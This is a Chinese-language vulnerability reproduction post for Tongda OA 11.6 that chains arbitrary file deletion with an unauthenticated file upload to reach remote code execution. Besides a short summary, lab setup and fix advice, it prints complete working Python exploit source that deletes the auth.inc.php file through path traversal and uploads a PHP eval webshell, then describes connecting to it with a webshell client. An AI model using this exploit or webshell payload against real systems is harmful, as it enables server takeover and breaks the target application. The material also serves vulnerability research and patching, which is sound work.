通达OA 任意文件删除结合文件上传导致RCE漏洞复现

0x00 漏洞概述

攻击者可通过任意文件删除漏洞删除认证文件auth.inc.php，然后组合文件上传漏洞最终可造成远程代码执行，从而导致服务器权限被拿下。

0x01 影响版本

通达OA 11.6（其他版本未进行尝试）

0x02 环境搭建

下载安装包后一键安装即可（后附下载链接）

 环境搭建成功

 

0x03 漏洞复现

直接使用exp进行漏洞利用

 

蚁剑连接webshell

执行命令

 

注意：利用此漏洞，会删除auth.inc.php，这可能会损坏OA系统导致程序功能无法使用

 

0x04 修复建议

删掉/module/appbuilder/assets/print.php

升级到最新版

 

 

 

通达OA环境：https://pan.baidu.com/s/1kGMIXRlOIuURv9xEBKlOGA  提取码：3a0z

exp源码：

import requests
target="http://192.168.217.137/"
payload="<?php @eval($_REQUEST['cl0wn']);?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")

url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-]Failed to deleted auth.inc.php")
    exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('hack.php', payload)}
requests.post(url=url,files=files)
url=target+"/_hack.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]Filed Uploaded Successfully")
    print("[+]URL:",url)
else:
    print("[-]Failed to upload file")